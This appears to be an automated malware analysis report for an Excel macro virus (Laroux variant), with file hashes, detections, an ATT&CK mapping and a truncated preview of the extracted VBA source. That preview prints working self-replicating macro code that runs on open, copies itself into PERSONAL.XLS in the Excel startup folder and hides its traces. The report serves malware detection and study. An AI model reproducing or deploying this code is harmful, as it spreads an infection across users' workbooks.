Xls.Trojan.Laroux-15 — Office (OLE) malware analysis

Static analysis result for SHA-256 1472bfb3ab6da3b6…

MALICIOUS

Office (OLE)

38.5 KB Created: 1998-09-23 12:54:48 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 86c1dc5672f80da3cb5e6ef986467b7b SHA-1: 26c6f065ec89b64d058fccf0c5ca0ebd2914af66 SHA-256: 1472bfb3ab6da3b6514674d216b9442c6c3c76ffe1ec703f11f835c35be537f1
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-15 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as the Laroux macro virus, a known Excel-based threat. It contains an Auto_Open macro that copies the malicious macro to PERSONAL.XLS, ensuring execution whenever Excel is launched. This establishes persistence by modifying the startup behavior of Excel.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-15 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-15
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15086 bytes
SHA-256: 40ca00f337e7e95cb890baf5ec1393f3742cba663c7fa352950955d19f62b02e
Detection
ClamAV: Xls.Trojan.Laroux-15
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "larouXYZ"


Option Explicit

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "larouXYZ.larouXYZ"
End Sub

Sub larouXYZ()
    On Error GoTo larouXYZ_Error
    Dim Temp As String
    Static Cnt As Integer
    
    Application.ScreenUpdating = False
    
    If Dir$(Application.StartupPath & "\" & "PERSONAL.XLS") = "" Then
        Sheets("larouXYZ").Copy
        Temp = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks(Temp).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
                , Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
    Else
        If Sheets(1).Name <> "larouXYZ" Then
            Workbooks("PERSONAL.XLS").Sheets("larouXYZ").Copy Before:=ActiveWorkbook.Sheets(1)
        End If
    End If
    
    Cnt = Cnt + 1
    If Cnt > 7 Then
        Cnt = 0
        Print_larouXYZ
    End If
    
    Application.OnSheetActivate = "PERSONAL.XLS!larouXYZ.larouXYZ"
    Windows("PERSONAL.XLS").Visible = False
    Workbooks("PERSONAL.XLS").Saved = True
    
    Sheets("larouXYZ").Visible = False
    ActiveWorkbook.Saved = True
    
    Application.ScreenUpdating = True
    
    Exit Sub
    
larouXYZ_Error:
    
    Exit Sub
    
End Sub

Sub Print_larouXYZ()
Attribute Print_larouXYZ.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Print_larouXYZ_Error
    Const MAX_COL = 62
    Const MAX_ROW = 38
    Dim Title(0 To MAX_ROW - 1) As String
    Dim Row As Integer
    Dim Col As Integer
    
    Cells.ColumnWidth = 1
    Cells.RowHeight = 7
    Cells(1, 1) = "larouXYZ Ver0.01"
    
    Title(0) = "11111000000000000000000000000000000000000000000000000000000000"
    Title(1) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(2) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(3) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(4) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(5) = "01111000000000000000000000000000000000000000000000000000000000"
    Title(6) = "01111000000111111000001111100111000001111110000011111001111100"
    Title(7) = "01111000011000111100000111101111100011100111000001111000111100"
    Title(8) = "01111000111000011110000111110111100111000011100001111000111100"
    Title(9) = "01111000111100011110000111100011001111000011110001111000111100"
    Title(10) = "01111000011000011110000111100000001111000011110001111000111100"
    Title(11) = "01111000000001111110000111100000001111000011110001111000111100"
    Title(12) = "01111000000110011110000111100000001111000011110001111000111100"
    Title(13) = "01111000011100011110000111100000001111000011110001111000111100"
    Title(14) = "01111000111100011110000111100000001111000011110001111000111100"
    Title(15) = "01111000111100111110000111100000000111000011100001111001111100"
    Title(16) = "01111000111111011111000111100000000011100111000001111111111100"
    Title(17) = "11111100011110001110001111110000000001111110000000111110111110"
    Title(18) = "00000000000000000000000000000000000000000000000000000000000000"
    Title(19) = "00000000000000000000000000000000000000000000000000000000000000"
    Title(20) = "00011111111100111111100111111110000011111001111111111111100000"
    Title(21) = "00000111110000001110000011111000000000110001110000001111000000"
    Title(22) = "00000111110000001000000001111100000000100001100000011111000000"
    Title(23) = "00000011111000010000000000111100000001100001100000111110000000"
    Title(24) = "00000001111000010000000000011110000001000001000000111100000000"
    Title(25) = "00000000111100100000000000011110000010000000000001111100000000"
    Title(26) = "00000000111111000000000000001111000010000000000001111000000000"
    Title(27) = "00000000011110000000000000001111000100000000000011111000000000"
    Title(28) = "00000000011111000000000000000111101000
... (truncated)